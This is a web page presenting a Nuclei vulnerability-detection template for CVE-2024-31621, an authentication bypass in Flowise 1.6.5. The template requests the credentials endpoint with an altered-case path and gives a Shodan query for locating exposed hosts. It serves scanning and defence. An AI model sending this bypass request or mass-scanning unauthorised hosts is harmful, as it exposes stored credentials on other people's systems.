Skip to content

Flowise 1.6.5 - Authentication Bypass

ID: CVE-2024-31621

Severity: high

Author: DhiyaneshDK

Tags: cve,cve2024,auth-bypass,flowise

The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability.

id: CVE-2024-31621
info:
name: Flowise 1.6.5 - Authentication Bypass
author: DhiyaneshDK
severity: high
description: |
The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability.
reference:
- https://www.exploit-db.com/exploits/52001
- https://github.com/FlowiseAI/Flowise/releases
- https://flowiseai.com/
classification:
epss-score: 0.00381
epss-percentile: 0.72907
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-2051052918
tags: cve,cve2024,auth-bypass,flowise
http:
- method: GET
path:
- "{{BaseURL}}/API/V1/credentials"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"credentialName":'
- '"updatedDate":'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100cc029b812c83b5fdc7b91859dba2c94fbfb5ce3c409788f91f97113101924b64022100fba9f763733707412b48b0530e07d92e35de3a7db9a31ba765e8466f8d67057a:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-31621.yaml"

View on Github